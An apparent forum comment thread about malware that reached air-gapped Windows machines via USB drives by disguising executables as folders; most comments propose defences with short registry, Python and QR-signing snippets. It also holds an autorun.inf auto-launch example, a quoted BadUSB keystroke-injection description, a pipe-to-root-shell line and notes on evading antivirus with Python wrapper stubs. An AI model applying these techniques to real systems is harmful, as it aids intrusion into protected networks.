I think the things to blame here are the design of Windows and the overall design of the air-gapped environment.
Yes, at the end of the day you're going to need to move stuff from non-air-gapped devices to air-gapped devices and vice-versa. You can assume the non-air-gapped devices are completely compromised. But why is the air-gapped device not configured to always show file extensions?
This is literally working because Windows is configured to hide common file extensions, and the attack relies on hiding a folder and replacing it with an executable with a folder icon and the same name +.exe.
If you're designing an airgapped system, this is literally the first thing you should be worried about after ensuring that the system is actually airgapped.
At least Windows Explorer should have been configured to show extensions (and some training delivered to ensure that the people using these systems have the diligence to notice unusual file extensions with familiar-looking icons).
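For what it's worth, that Explorer setting is just a per-user registry value, so an air-gap build script could enforce it. A minimal sketch in Python, assuming stock Windows (HideFileExt is the real value name; 0 means extensions are shown):

```python
# Sketch: force "show file extensions" for the current user.
# Explorer picks the change up after the shell restarts.
import winreg

with winreg.OpenKey(
    winreg.HKEY_CURRENT_USER,
    r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
    0,
    winreg.KEY_SET_VALUE,
) as key:
    winreg.SetValueEx(key, "HideFileExt", 0, winreg.REG_DWORD, 0)
```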
It would be even better if the file explorer was replaced with something less easy to fool. Something which does not load custom icons, never hides directories, and maybe even prevents access if the flash drive has indications of shenanigans (unusually named files, executables, hidden folders) which would indicate something weird was going on.
It's a good job that unlike with Stuxnet nobody plugged in a flash drive from the literal car park, but this is pretty poor on the part of the people designing/implementing the airgapped environment.
> If you're designing an airgapped system, this is literally the first thing you should be worried about after ensuring that the system is actually airgapped.
And next time if some other airgapped vuln is reported, that will be literally the first thing people should be worried about! God, people are so stupid, if only they would just do literally the first things they should be worried about.
>if only they would just do literally the first things they should be worried about.
As the sibling comments to this one pointed out, most people change the default Explorer settings first thing.
In fact, changing this default Explorer setting has been a standard security recommendation for years.
In conclusion, yes, I believe if something is in a common list of things you should do to make your Windows system more secure (for, like, people who are not security experts) and you don't do it, then probably "God, people are so stupid" is a reasonable response.
In conclusion, yes, I believe if something is in a common list of things that people (who are not security experts) should do to make their system more secure and the developer of that system refuses to make that the default, then "God, that developer is so stupid" is a reasonable response.
I wouldn't blame most people for not changing this setting.
Except air-gapped systems should be set up by security experts, so stupidity all 'round.
Good point re. Windows’s default configuration being less secure due to file extensions being hidden. This is another manifestation of the continuous tax paid for Windows’s insane level of backward compatibility. I think the root cause is that Microsoft thinks files ending in .EXE are ugly (but they don’t want to stop using this convention, which I don’t think is strictly required by the kernel or filesystem, but would probably break other things in the OS and 3rd party tools), so they hide that and all other file extensions (which maybe they also think are ugly, but I don’t see an alternative since files with multiple data streams are not handled well for interchange). Not sure why the default isn’t just to hide the extension of executable files, though I think this is more trouble than it is worth, for the reasons demonstrated by this attack.
I would also consider disabling USB ports in air-gapped systems. You can still buy PS/2 keyboards and mice. Server and maybe some workstation motherboards still have PS/2 ports (and there are PS/2 PCI cards). For sneakernet file transfer you can allow use of an SD card. That way, if you see a USB cable or other device in an air-gapped environment, it should be an immediate red flag.
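Blocking USB mass storage in software is a similarly small change, and could complement the physical measures above. A sketch, assuming it is run elevated (Start=4 is the standard "disabled" value for the usbstor driver):

```python
# Sketch: disable the USB mass-storage driver so new USB drives
# no longer mount (requires administrator rights).
import winreg

with winreg.OpenKey(
    winreg.HKEY_LOCAL_MACHINE,
    r"SYSTEM\CurrentControlSet\Services\USBSTOR",
    0,
    winreg.KEY_SET_VALUE,
) as key:
    winreg.SetValueEx(key, "Start", 0, winreg.REG_DWORD, 4)
```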
>This is another manifestation of the continuous tax paid for Windows’s insane level of backward compatibility. I think the root cause is that Microsoft thinks files ending in .EXE are ugly (but they don’t want to stop using this convention, which I don’t think is strictly required by the kernel or filesystem, but would probably break other things in the OS and 3rd party tools), so they hide that
I don't think they think the extension is "ugly". I think they expect their users to think that way, on average, and don't want to deal with being told such (or getting support requests because ignorant users tried to remove that part of the filename and now can't open Word or whatever).
I wouldn't call it the result of backwards compatibility, either - although Windows' level of backwards compatibility is insane and does impose a continuous tax. But in the current case, there would need to be a new system for inferring executability before we could talk about removing the existing one. AFAIK Windows uses file headers to determine the format of an executable file (i.e. how to load it), but not to decide whether a given file should be deemed executable at all. And the attrib bits, also AFAIK, don't include anything for execution either.
>I would also consider disabling USB ports in air-gapped systems.
I assume they aren't worried about "BadUSB" type attacks because they're in control of the physical media used for transfer.
> or getting support requests because ignorant users tried to remove that part of the filename and now can't open Word or whatever
Funny side story: Windows pops up a confirmation message if you change or remove the extension of a file name as part of a rename operation.
There's no way to disable this message outside of writing an AutoHotkey script to check for the prompt and auto-accept it. (I did this once; no, I don't have the AHK script, but I don't recall it being hard to write.)
On a similar funny side note, there's no way to tell Windows to always open files with no extension in a specified application (e.g. gvim). But you can edit the registry to do it.
> On a similar funny side note,
Those things are only funny if you don't have to use this "Operating System" hours a day. Because then it becomes a PITA.
Having to deal with other people using it is far more obnoxious than actually personally using it, IMX. For sophisticated users it's not hard to learn these details, and then one naturally just doesn't hit the pitfalls. Teaching the details to someone less sophisticated, and making them stick, is a whole other ball game.
> This is another manifestation of the continuous tax paid for Windows’s insane level of backward compatibility
Well, no. This bullshit was introduced later by Microsoft to make Windows more "user friendly", along the same lines as the truncating of URLs in browser address bars by Google and Mozilla.
For that matter, would they ever need to move anything executable? Seems to me on Linux they could have just set up a preemptive `chmod -x` of everything copied in from the drive.
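A minimal sketch of that idea, assuming a Linux machine where the drive mounts at a known path (paths here are illustrative):

```python
# Sketch: copy everything off removable media while stripping execute
# bits, so nothing that crosses the gap arrives runnable.
import os
import shutil
import stat

def import_from_drive(src: str, dst: str) -> None:
    for root, _dirs, files in os.walk(src):
        target_dir = os.path.join(dst, os.path.relpath(root, src))
        os.makedirs(target_dir, exist_ok=True)
        for name in files:
            target = os.path.join(target_dir, name)
            shutil.copyfile(os.path.join(root, name), target)
            # The `chmod -x` step: drop all execute permissions.
            mode = os.stat(target).st_mode
            os.chmod(target, mode & ~(stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))

import_from_drive("/media/usb", "/srv/incoming")
```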
For many years I've just viewed all of my devices as possibly compromised. It's one of the reasons I've been very down on cryptocurrencies in general. I don't actually see USB as something that can maintain a true, robust airgap, because the amount of data transferred is not inspectable.
In my view, the best use of an airgapped machine would be for storage of extremely dense and sensitive information such as cryptographic keys. Signing or encryption should be accomplished through an inspectable data channel requiring manual interaction such as QR codes. When every bit in and out of a machine serves a purpose, it's much less likely to leak.
Example: show a qr code to a camera on the airgapped machine and get a qr code on the screen containing the signature of the data presented to it. There is very little room for nefarious code execution or data transmission.
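To make concrete how little the air-gapped side has to parse, here is a sketch of the signing half, assuming the third-party `cryptography` and `qrcode` packages; camera capture and QR decoding are left out:

```python
# Sketch: sign a fixed-size payload and emit the signature as a QR image
# to be shown on the air-gapped machine's screen.
import base64

import qrcode
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

signing_key = Ed25519PrivateKey.generate()  # in reality, loaded from cold storage

def handle_request(payload: bytes) -> None:
    signature = signing_key.sign(payload)
    img = qrcode.make(base64.b64encode(signature).decode())
    img.save("signature.png")  # displayed for the other machine's camera

handle_request(b"transaction-to-sign")
```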
How about a USB "MITM" device that presents itself as a serial port to the OS when the user connects a USB storage device?
The user would then use a terminal emulator to connect to something like a BBS[1] where they could browse files, and download or upload files to the connected USB storage device using XMODEM[2] like in the good old days.
edit: It could of course also filter the files, for example not list any executable files, and prevent transfer of executable files based on scanning their contents.
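That content filter can start as simply as refusing anything whose header looks like a program, independent of the filename; a sketch (PE and ELF magic numbers; a real filter would check far more):

```python
# Sketch: reject transfer when file content starts like an executable.
def looks_executable(header: bytes) -> bool:
    return header.startswith(b"MZ") or header.startswith(b"\x7fELF")

with open("incoming.bin", "rb") as f:  # illustrative filename
    if looks_executable(f.read(4)):
        raise SystemExit("refusing to transfer: executable content")
```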
The MITM device would be implemented using a microcontroller with signed firmware, and careful design to prevent a connected USB device from doing shenanigans like voltage glitching. This would include using isolated DC-DC converters and isolated data lines, like this[3].
The MITM would only interact with the storage device class. If the connected device presents itself as more, say a keyboard, it would just ignore those.
The user must be prevented from bypassing the MITM device, though this could be done through physical means.
[1]: https://en.wikipedia.org/wiki/Bulletin_board_system
[2]: https://en.wikipedia.org/wiki/XMODEM
[3]: https://ez.analog.com/ez-blogs/b/engineerzone-spotlight/post...
I like it. Seems like it might be useful for mice and keyboards as well.
Have a few ports on it:
* This device can only be a mouse -> USB
* This device can only be a keyboard -> USB
Then it filters everything coming in to ensure that it matches the desired type of activity.
For USB drives, I'm tempted to say it should read the USB drive once, and copy all information to internal storage in order to prevent data being sent to the usb via timed or coordinated reads. This would allow a truly read only thumbdrive.
Back in the day I made a proof of concept of animated QR codes using fountain codes - txqr. [1] Since then I've received a bunch of requests to make it into an actual cross-platform app, but never could find the time for this hobby project. I guess I should revive this project and make a usable open-source app.
[1] https://divan.dev/posts/animatedqr/
This is probably a decent use case for plain old serial. Interface via application defined TTY.
On the other hand no matter the transport you’re probably going to get owned by well known vulnerabilities in any software processing data from the internet-connected side, if you’re using the air gap as an excuse to avoid patching or otherwise caring about secure coding practices.
Then you’re still at the mercy of the TTY application being secure. Having to go through the analog hole makes it much more difficult.
As for patching, you would ensure a secure root of trust and only allow read-only media to deliver said updates as another sibling points out
Air gapping is still valuable, but doing it well ranges from hard to impossible. For example, Stuxnet was delivered by an insider. So good physical security and monitoring are also needed to protect against insider threats.
I think of the sensitive, air-gapped information as an infection. If an old and “infected” machine needs upgrading then it’s easier to put a new, freshly upgraded machine into the infected area, copy the sensitive data over to the new machine, then incinerate the old one.
Anything that does come out of the infected area intact has to be cleaned or inspected carefully to ensure it is free of the “sensitive data” infection.
That would happen in a secure environment with auditors and multiple sysadmins who would have the ability to do things normally disallowed. Different threat model
"Patching" is the fundamental reason airgapping isn't a sound solution, IMO. If you're a TLA you can probably find some secure, verifiable, write-only way to transfer patches to your air gapped machines. But for any normal person/organization; you'll very likely end up less secure due to how hard this is.
You can use DVD-Rs to load a WSUS server for Windows or a package mirror for Linux, I’d just be surprised if many airgapped operators were keeping on top of this.
Any device without a screen is somewhat useless here, especially for crypto, because you want to see what you are signing before you sign it.
I'm imagining a "secure slate" you can carry between the computers, a tiny tablet with a camera, e-ink display, and replaceable batteries. It does nothing but snap a picture of a QR code and then (if error checking is OK) reproduce it on its own durable display. Add a write-protection switch that doubles as a cover on the camera lens, and have it auto-blank when not in use.
So you'd snapshot its QR code, hand-carry the slate to air-gapped Computer B, press a button to wake it up, brandish the "copied" QR code in front of B's camera, etc. Maybe even take one and (with careful labeling) put it into a safe, depending on how long you plan to store it.
You could do something similar with a camera and thermal-paper printer, but then the physical artifact needs to be reliably destroyed by manual effort, as opposed to auto-erasure.
https://seedsigner.com/
https://foundation.xyz/passport/
https://store.blockstream.com/products/blockstream-jade-hard...
I'm okay with it taking a minute or two to install software on a high security system, eg, the root cryptography for our military radios.
…maybe I should get into the business of "paper drives".
https://github.com/coinkite/BBQr
... Plus one more QR code to quit vi(m) when it's accidentally launched.
With appropriate encryption between the two machines, the slate could even be a simple smartphone.
It doesn't matter whether the smartphone is internet-connected or not, as the slate's contents wouldn't be of any use without hacking one of the machines, and if you could do that, you wouldn't need to hack the slate in the first place.
For longer term storage use an analog camera to take pictures of the QR codes, then develop the film and store them in an airtight climate controlled vault. Bonus points if the film is designed to be very stable after developing. Maybe platinum prints with lots of error correction.
Well, the context is a facility where security must be so tight that you're air-gapping computers in the first place, so a lot of the same reasons nobody would be permitted to bring their personal film-camera into the place either: You don't want to make it easy for people to take pictures of arbitrary things (faces, documents, whiteboards) and you don't want to always be searching everyone's underwear for instant-photos or film-canisters.
In contrast, a worker can sign-out a hardened device, and when they return it on the way out you can be reasonably sure they couldn't have easily made copies. Plus the scanner won't capture arbitrary pictures in the first place, and it can be set to auto-wipe after X minutes of inactivity.
If you give people 10 unexposed sheets and require them to return a total of 10 used/unused on the way out, that's susceptible to them smuggling in an unexposed sheet, and you're back to underwear searches again.
This is interesting. Another use for such a secure machine would be to enter text, eg highly controversial blog entries or erotic stories. Then any common computer or phone with a camera can be used to transfer the text using 2D barcodes.
This would be a bit slow. If we assume a single barcode can hold 1500 characters (text twice as long as your comment), a blog entry may need 4-5 barcodes. Not undoable.
Such a machine would not have a camera, WiFi, BT, or any input or output mechanism of any kind.
But perhaps we are just saying the same thing, and I just prefer my way of saying it over admitting to yours...
I mean, this thread has itself very clearly turned into some crypto-fetishist fan fiction, completely departed from reality. I guess it’s just what came to mind.
You nailed the term I didn't know I was looking for, that's exactly it! As a fantasy I've thought about creating a secret identity and have researched how to keep it absolutely safe. This is very hard, and you can spend quite a bit of time designing ever more elaborate schemes.
Ok, that was the first time I heard the phrase ("recreational paranoia") and I am now lost in a sea of links. Can you elaborate on it? It sounds fascinating to me from context alone.
Yes. But using USB devices has a practically infinitely greater attack surface than parsing data embedded in a QR code. It's not like you have to read QR codes and go "echo $QRData | sudo bash".
Is it just that the amount of data it holds is more constrained?
Source? Unless you're using something like USB 4 (i.e. Thunderbolt), USB devices don't have DMA access.
"BadUSB is a computer security attack using USB devices that are programmed with malicious software.[2] For example, USB flash drives can contain a programmable Intel 8051 microcontroller, which can be reprogrammed, turning a USB flash drive into a malicious device.[3] This attack works by programming the fake USB flash drive to emulate a keyboard. Once it is plugged into a computer, it is automatically recognized and allowed to interact with the computer. It can than then initiate a series of keystrokes which open a command window and issue commands to download malware. " -- https://en.wikipedia.org/wiki/BadUSB
The Soviets had a strong typewriter implant game[0]. They might have to revive some of their old tradecraft to either deliver implants via the card punches, or monitor what is being sent over the air gap.
[0] https://spectrum.ieee.org/the-crazy-story-of-how-soviet-russ...
I considered saying bearish. Maybe I could have been clearer.
so you consider that someone may be reading and possibly modifying data on any computer/phone you own, okay
> It's one of the reasons I've been very down on cryptocurrencies in general
but you are willing to have a form of money that is only accessible via said computer/phone that someone can read and use as if he was you?
how does it work? how's this not a contradiction?
I have a low opinion of the usefulness of cryptocurrencies because true security is so difficult. It's basically impossible, even if you don't make any mistakes.
I really enjoy this kind of stuff, and loved reading about the z-cash ceremony. I'm not going to those lengths to protect my secrets, so I feel it's better if I don't hold a lot of wealth in such a fragile way.
I used to like it, but now I don't. It's still neat, but it's too prone to costly mistakes.
not everyone is a stock marketeer - I personally keep reading bullish as derived from a bully - something clearly negative
Bullish and bearish are common stock market terms[1] meaning optimistic and pessimistic. Hawkish means advocating war, which doesn't clearly align with optimistic or pessimistic.
[1] https://www.nerdwallet.com/article/investing/bullish-vs-bear...
The first time I tried to type a long public key it took me like 10 minutes, and was a pain in the butt. If it's something you're doing a lot, using QR codes can make it much faster and easier.
Why does anyone run an operating system that grants ambient authority to executables?
This is analogous to a power grid stripped of all fuses and circuit breakers to make it easier to design toasters.
We've studied this problem since 1972[1]. Solutions were found (but the Internet Archive is down, so I can't be sure [2] points to the right files now).
[1] https://csrc.nist.rip/publications/history/ande72.pdf
[2] https://web.archive.org/web/20120919111301/http://www.albany...
People drew and quartered Microsoft over simple access-elevation prompts (UAC) in Vista, let alone a granular permissions system. It had to be dumbed down significantly over the years to be widely accepted.
People have been doing the same for Apple when it tried to bring explicit app permissions to MacOS. https://tidbits.com/2024/08/12/macos-15-sequoias-excessive-p...
That's lazy design, and it doesn't work.
You can't just present the user with something that amounts to a "Press OK to continue" dialog, and call them stupid when they press OK, and call them whiney when they think it's annoying.
What Apple is doing is significantly better. Instead of a single popup that grants access to everything and shows before the app even opens, you can granularly accept or deny individual access to things. And the program keeps working when you decline.
Okay, but permission prompts as such are not why people complained. Sure, of course you don't want apps to record your screen without permission. The problem is Apple has taken away your right to even grant this permission, for more than a week, unless they also consent (and extract a fee from the app developer). It's part of their ongoing frog-boiling campaign to remove users' freedom to run arbitrary software on Macs; this is what people object to.
You can make an argument that UAC was part of a similar strategy, but not paying for an EV certificate only results in a one-time annoyance for your users, not a continuous one. UAC is equivalent to Gatekeeper. This permissions nonsense is worse than UAC.
Do you want to give your wallet to the cashier? (Yes/No)
We can all agree UAC and permission flags suck.
And yet, most ecommerce shops easily remember the credit card on file (Amazon, Steam, etc.), and you can literally one-click buy.
Computers don't have to be that stupid about it. It was someone inside Microsoft being passive-aggressive, instead of actually doing their job and presenting useful options at runtime, that resulted in the horror that was UAC.
I would imagine these tools use exploits in the existing executables to deliver the payload, and then - if I understand correctly - use scripting/interpreted languages (Python) to run the operation.
So, even if you’d need admin confirmation to run each new binary, it wouldn’t help - because no new binaries are executed, just Python with a new set of scripts.
And, correct me if I’m wrong, but preventing the OS from running new scripts would be virtually impossible.
AFAIK it only worked with optical drives, not pendrives. I've spent hours trying to get this functionality on my pendrives back in the day, to no avail (thankfully!). It was on Windows XP, and Windows 98 needed external drivers to even use pendrives at all, so if such an attack vector existed, it must have been on Windows 2000 or Me (i.e. between 98 and XP), so an arguably very short time frame (if at all!).
I don't remember the whole details, but I believe it installed an autorun.inf file on all USB drives so that inserting the drive on another PC would install it automatically.
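For context, autorun.inf was just an INI file in the drive's root; something of roughly this shape (executable name illustrative) was honored by older Windows versions, which is why Microsoft eventually stopped processing AutoRun entries from removable drives:

```
[AutoRun]
open=updater.exe
icon=updater.exe,0
```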
I once designed and built an air-gapped system and it did not involve operators plugging USB devices to and from MS Windows machines. (We used data diodes).
It is strange to me that a security-conscious organisation such as a ministry of foreign affairs would build an air-gapped system this way. Possibly it's a compliance checklist item from their parent organisation, but with no oversight?
The US has "forward deployed" State Department personnel that handle information security of embassies and consulates in a standardised way; probably this SE Asian country (and the EU organisation) should follow suit.
The US has a history of major data breaches by low rank IT security personnel throughout multiple branches of the government. A security monoculture is not necessarily a great approach on the balance of things.
See: Hezbollah & pagers.
(Their walkie-talkies also exploded.)
They do and did use many methods of communication, and the pagers were just one part of it. Exactly to not be reliant on conventional computers and their insecurities, but on seemingly simple and secure devices. They just did not expect the sophistication of the Mossad to hijack the production facilities.
My understanding from the description of the attack is that it didn't rely on any vulnerability in USB, only social engineering made possible by the Windows UI.
Given that air gapped American government machines would be vulnerable to similar techniques, why don’t common operating systems build mechanisms to make this stuff more difficult?
* force a prompt before executing anything off external media
* disallow anything other than input devices for USB
* disallow unsigned binaries from running
* work to require USB peripherals to carry a unique cryptographic signature so that you can easily lock the set of allowed devices once the machine is set up
Heck, a lot of this stuff could be valuable to help secure corporate IT machines too.
About 20 years ago, I was setting up a shared PC at my university. I googled for a way in Windows XP (via registry or group policy) to only let specific programs run. I added stuff like explorer.exe, iexplore.exe, winword.exe, acroread.exe, and a few others.
Fast forward a few years, and the computer was still running great. The desktop and downloads folders were full of messengers, "flash players" and other malware - but all binaries were throwing cryptic error. Since no one in IT was around or cared, nobody figured out how to edit the allow list. The computer was deemed half-broken. But when neighboring PCs were completely infested, this one could still open, edit, and print office docs flawlessly.
It felt like a magic fix for shared Windows PC security.
ACRORD32.EXE was actually cmd.exe
WINWORD.EXE was actually Mozilla
...and so on
Edit: one of those exes was regedit, and every time I sat down I'd delete all the keys named Policies as a routine exercise. After that, restart explorer with one of the tricks. I don't remember the specific one but it wasn't officially documented, iirc.
https://superuser.com/questions/335917/how-can-you-do-a-clea...
Since 2008 or so, all US government computers on SIPR block USB storage devices unless they are on an approved list. Autorun is disabled.
Physical security is another big factor, there is a long checklist for a SCIF that at some level takes into account TEMPEST type threats that mitigate many attacks on air gapped systems.
And none of these things are the default on commercial software because users want it to be frictionless. They want software to install right away when you plug in a USB drive, etc.
There is basically no security-focused PC hardware, aside from maybe Raptor systems, which isn't really the same ilk.
Off the top of my head, a lot of these devices and hardware were scam traps by LEO.
I'd go out on a limb and say this isn't a problem anyone actually wants to solve.
I don't think that would have protected against this attack. I think it was the users' workflow to plug USB drives into non airgapped computers, then into the airgapped computers. So those USB drives would be put on the approved list, and also be used by the attackers.
Would you agree that perhaps executables whose origin is a USB drive should be treated as equivalent to a browser download and unconditionally get a prompt to execute, even if they were copied off the USB? I think it’s naive to think that our own security wouldn’t be helped by improving software measures even if it does risk our own offensive capabilities - we have very advanced and well funded adversaries ourselves.
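That would essentially extend the "Mark of the Web" to USB-sourced files. Browsers implement the mark as an NTFS alternate data stream, and anything that copies files inbound could write the same thing; a sketch (NTFS-only, path illustrative):

```python
# Sketch: tag a file the way browsers tag downloads, via the
# Zone.Identifier alternate data stream (ZoneId 3 = Internet).
def mark_from_internet(path: str) -> None:
    with open(path + ":Zone.Identifier", "w") as ads:
        ads.write("[ZoneTransfer]\nZoneId=3\n")

mark_from_internet(r"C:\incoming\report.exe")
```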
Getting the balance between security and usability right is tricky. It doesn’t make sense to have to click yes to trust software when you run it a hundred times a week, pretty quickly you are just clicking and not actually considering the risk. At the same time, for an airgapped systems where updates are rarely installed and the impact is much higher it makes sense to only allow whitelisted software and prompt each time
It does prevent you accidentally running something that you didn't expect to be an executable in the first place as is the case here. I doubt you're running executables off of USB drives hundreds of times a week on air gapped machines.
To my understanding, none of that would have been relevant here. Users copied the executable (disguised as a folder) from the external media (which was one of their own devices, and would have been in the "set of allowed devices" under such a scheme) which was a perfectly normal input device (not some BadUSB hack). It probably wouldn't be hard to get a malware launcher appear "signed", either. Even if we disallow self-signing, the launcher only needs to be a wrapper to start Python (which can be supplied alongside). Such wrappers are provided by Python[1]. I don't know if these are signed normally, but it seems pretty easy to imagine.
All the technical "hacking" happened on the non-air-gapped side, so that that computer would put malware onto the USB with a deceptive presentation (an .exe with an icon to look like a folder and with the same name as an expected folder, while the actual folder was hidden). The rest is social engineering (and Windows not showing the .exe extension).
[1]: `pip3.exe` is an example; it's hard-coded to run the Pip module from `site-packages`, but `pip.py` could be replaced. More to the point, these wrappers are automatically created by Setuptools, to run an arbitrary script specified in the build process, from a "stub" included with Setuptools. (All of this is to work around the lack of support for shebangs, of course.) I don't know if Setuptools can or does sign these wrappers. Probably not.
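To make the footnote concrete, such a stub is functionally something like the following, just compiled to a .exe; it is "benign" in exactly the sense that it contains no payload of its own (a rough Python equivalent, not Setuptools' actual code; the module path matches current Pip but is otherwise illustrative):

```python
# Rough equivalent of a console-script wrapper: import a fixed module
# and hand control to its entry point.
import sys
from importlib import import_module

def main() -> int:
    entry_point = getattr(import_module("pip._internal.cli.main"), "main")
    return entry_point()

if __name__ == "__main__":
    sys.exit(main())
```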
We recently started enforcing a policy of scanning external media before letting it be usable by the system, and the MBAM scan of a flash drive takes so long that it's driven the most complaints of any IT policy change we've made. Some people are just so latched on to that floppy disk lifestyle that the only change to their workflow in decades has been what part of the computer they put their storage in.
These are all standard security requirements for NATO accredited systems.
The human drive for convenience and perhaps a bit darker, to rebel against rules, will always serve as pathways to compromise. And in the case of a powerful hostile actor, bribing someone.
>* disallow anything other than input devices for USB
I think that will greatly reduce the ability to get work done. It's my understanding that the workflow for using these specific airgapped computers involved moving USB thumb drives between computers.
Now you're making me wonder if keyboard firmware could be an attack vehicle.
I've been wondering lately how these USB execution attacks happen. Surely no modern system auto-runs things from a USB, so there has to be some kind of executable on the drive which the user of the drive either A. Expects to be there, or B. Doesn't notice is there. A sounds a bit strange, but maybe the system is updated over USB, that means that the hackers got into the update pipeline which is very bad. B might be more likely, create an EXE with the thumbnail of an image and maybe you could trick a user into clicking it. Or maybe some nefarious excel macro. But in this case it's strange that the system allows these things to be executed.
Does anyone have more details on how this is done?
> It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
Does the malware EXE that now looks like a Folder icon with same name as the last modified actual folder (which is now hidden) ... also redirect the user to the actual folder and its contents in file Explorer after successfully delivering its malicious payload?
THAT would probably ensure the user does not suspect anything nefarious has happened, even after the fact.
Now how Windows Defender and other heuristics-based firewalls would not treat the malicious EXE with folder icon as a threat and quarantine it immediately -- I don't know.
[1] https://www.welivesecurity.com/en/eset-research/mind-air-gap...
>how Windows Defender and other heuristics-based firewalls would not treat the malicious EXE with folder icon as a threat and quarantine it immediately -- I don't know
The "malicious" exe, as I understood it, just boots up Python to run a script, where the actual malice lies. Windows Defender has to treat an executable that does only this as benign - because Python's packaging tools provide such executables (so that Windows users can get applications - including (upgrades to) Pip itself - from PyPI that "just work" in a world without shebangs and +x bits). For that matter, standard tools like Setuptools could well have been used as part of crafting the malware suite.
Presumably they could notice that an .exe has the normal folder icon. But presumably that icon could also be slightly modified in ways that would defeat heuristic recognition but still appear like a folder icon to a not-especially-attentive human.
>Does the malware EXE that now looks like a Folder icon with same name as the last modified actual folder (which is now hidden) ... also redirect the user to the actual folder and its contents in file Explorer after successfully delivering its malicious payload?
I didn't see anything about that in the description of the attack. But I assume that the Python script could accomplish this by just making an appropriate `subprocess.run` call to `explorer.exe`.
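On the Python side that redirect would be a one-liner (folder path illustrative):

```python
# Sketch: open the real (now-hidden) folder in Explorer so the user
# sees the contents they expected after the payload runs.
import subprocess

subprocess.run(["explorer.exe", r"E:\Documents"])
```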
And also, which person setting up an air gapped system allows execution from a removable media? You'd think with that level of paranoia you'd have a couple more rules in place.
There are many ways. A simple way is to simulate a USB hub with an input device and a usb drive. You use the input device to execute whatever is on the drive. Another way is to identify as a device whose driver has some vulnerability. Windows auto-installs that driver, then you exploit it.
Sure, if you're the one who created the USB drive then you could make it not actually a USB drive. But this sounds like an infected machine infecting previously safe USB drives and turn them into malicious ones. And I'm not sure I get how a USB drive can be turned malicious. I vaguely remember there was a bit you could flip in older USB drives to make them appear as disk drives and enable autorun, but I doubt that's how this is done.
I think it's the firmware. Outside of the main drive, there are smaller chips that work with the OS to r/w the main drive. Each chip has firmware whose memory is usually r/w as well.
Once you can manipulate the code in the firmware, it's probably pretty easy to find a kernel-level exploit.
Here is a reference with a virus. https://superuser.com/questions/854918/manipulating-firmware...
> simulate a USB hub with an input device and a usb drive
Yea but that has to be a custom or specific kind of programmable USB device. Or one that somehow unintentionally allows you to reflash its firmware to something else.
And also if anyone ever plugs your malicious USB device into a Mac, they will get a pop-up from macOS that asks you to identify the keyboard. Although maybe if it fakes a specific USB keyboard that macOS knows out of the box, you could avoid that?
> It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
Mac and Gnome do too. I think somehow overlaying that it’s an executable and double-checking if you want to execute from a removable drive might be better techniques than worrying about file extensions which only help people who know what they’re doing already (in which case it’s common to configure the UI to show those extensions)
No. Colorblindness does not mean that one does not see any colors. There is only a tiny fraction of colorblind people who really cannot see any colors, and even they can still spot different luminances.
Allowing the user to run an executable directly off a USB drive seems like a very bad idea for an air-gapped computer. It's hard to imagine a scenario where this would be necessary.
Copying the "folder" onto the local machine first wouldn't have helped, though. It would still be an executable, and the user would still be enticed to double-click it (because it would still appear to be a folder which the user expected to contain desired files). We could fall back to "allowing the user to use a GUI to select files seems like a very bad idea when they come from the other side of an air gap", but at some point a concession has to be made to usability.
The problems here are to do with how Windows uses and presents file extensions.
Every well-funded nation-state has an "equations group", but by design it is rare to detect, much less publicize, their actions.
External buses and RF comms present massive attack surfaces that must be locked down with religious fervor including auditing, disabling, and management.
So running programs by sticking in a USB drive is a critical security bug. Has Microsoft reported this to the European Union within a day? Is Microsoft now going to be fined 2.5% of their turnover under the Cyber Resilience Act?
I worked in a data center situation once where there was a physical switch that disconnected the outside network connection which was turned on only in very special circumstances. The USB ports were filled with super-glue.
I always thought that the big switch was probably still a massive vulnerability - is it air-gapped or not? When the switch is flicked it only takes milliseconds for an exploit.
Anyway, not sure what happened to those guys in the end.
Is it just me that thinks "USB device plugged in" != "airgapped"??
Heck every TV show has someone downloading the nuclear plans off Dr. Evil's laptop by...plugging in a USB device when he's distracted by spilling his coffee.
This is exactly why Qubes OS has been developed, with its strong hardware-assisted virtualization. All USB devices belong to a dedicated VM, which is reset every time it's restarted. My daily driver, can't recommend it enough! https://qubes-os.org
Did I get it wrong, or was the infection through USB? I thought it was something related to a remote/wireless attack. Is such an attack even possible on air-gapped systems?
In my experience it doesn’t stop admins connecting an “offline Root CA” to the WiFi network to install their entire suite of server management software — none of which are functional without an active network connection.
Yes, my plan was to physically remove the wifi adapter daughter card. They exposed the CA to gigabytes of third-party software before I turned up to do the setup. Yes, I warned them not to even take the computer out of the box.
Offline anything just breaks people’s brains.
“How do we keep the anti-virus pattern file up to date?”
Do they still make non-USB mice/keyboards? I am also wondering if the CEC HDMI protocol could be exploited. Plug in a nefarious monitor which can send a payload and receive a graphic stream back with the response.
We used a Dell workstation laptop, which has ECC memory and a Xeon processor like a server. Built-in keyboard and trackpad reduces the risk of random external devices needing to be used.
Protection was BitLocker drive encryption with a manually entered (long!) passphrase to decrypt. Backups were to encrypted USB media never plugged into anything else other than a redundant clone of the CA used for DR testing. Everything went into safes.
This design works Well Enough for all but the most demanding purposes, but the whole rigmarole was undone by a well-meaning but naive admin “just doing his job”.
Yup. PS/2 keyboards and mice are still easy to find. As are VGA monitors. If you are super paranoid, you still need something more, as both PS/2 and VGA allow for bidirectional transfer. But at a certain point you need to trust your supply chain. If someone can tamper with your new monitor, they can probably tamper with your new server as well.
Even without compromising the host, you wouldn't want a monitor mirroring the output to an attacker, or a keyboard mirroring every stroke.
Perhaps the issue author thought the member was given this name because only privileged/blessed developers get to use the “cool stuff” of React. They likely don’t understand the reason why the concept of access modifiers exist in many programming languages.
Namely that (good) library authors will do everything possible to avoid breaking the public API, which can be seen as a “promise” from them in what can be relied upon, while internal/private members offer no such promises and the library author can feel free to change/remove them as desired with no prior notice.
Well, a proper air-gapped system would have zero surface area to the outside world, wouldn't it? Desoldering USB/FireWire/whatever ports is a basic thing to do. I had a colocated server where the USBs were neutered this way: it had an internal USB riser with the port removed and facing inwards, so if you took the system apart you could plug something in, but that means offline time.
